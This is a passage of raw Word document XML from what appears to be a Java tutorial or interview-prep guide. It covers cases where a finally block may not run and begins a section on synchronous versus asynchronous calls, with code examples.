      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39367E10" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8F0460" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// This will not be executed if JVM crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA7CB89" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside finally block"</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F383FEE" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF95C49" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEEB367" w14:textId="0E6EA928" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2AEE6" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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te</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While these scenarios are rare, they do demonstrate situations where the finally block might not be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC8BBD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AA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54B9CEDD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ystem.exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exits the JVM, preventing the finally block from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741E234" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 interruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the thread is interrupted during the finally block's execution, it may not complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358FD0A3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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VM crashes or fatal errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The finally block may not be executed if the JVM crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6943DED8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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general, the finally block is designed to always execute, but the above exceptions are cases where it might be skipped or ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB9086" w14:textId="720DEA99"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B1B5162">
          <v:rect id="_x0000_i1173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24281880" w14:textId="2E39792A" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00292109">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc196307529"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is synchronous and asynchronous call</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="54E963EF" w14:textId="0370E86F" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ynchronous Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABB380"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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the execution of the program is blocked until the operation being called completes. In other words, when a function is invoked, the calling thread waits for the function to finish its task before it proceeds to the next operation. The caller is blocked while waiting for the response, making it a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11E9A7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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haracteristics of Synchronous Call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D6F54" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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locking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The program execution halts until the current operation is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4C42E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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rder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The tasks are executed in sequence, and the next task is dependent on the completion of the previous one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646EA4E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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ear Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each task waits for the previous one to finish before it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1997AB1F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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71AE310C"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SynchronousExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C9FB5"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3077137"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7B075"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3077137"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 1 Started"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752939D7"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        task1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499CD5EE"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3077137"/>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660066"/>
          <w:sz w:val="20"/>
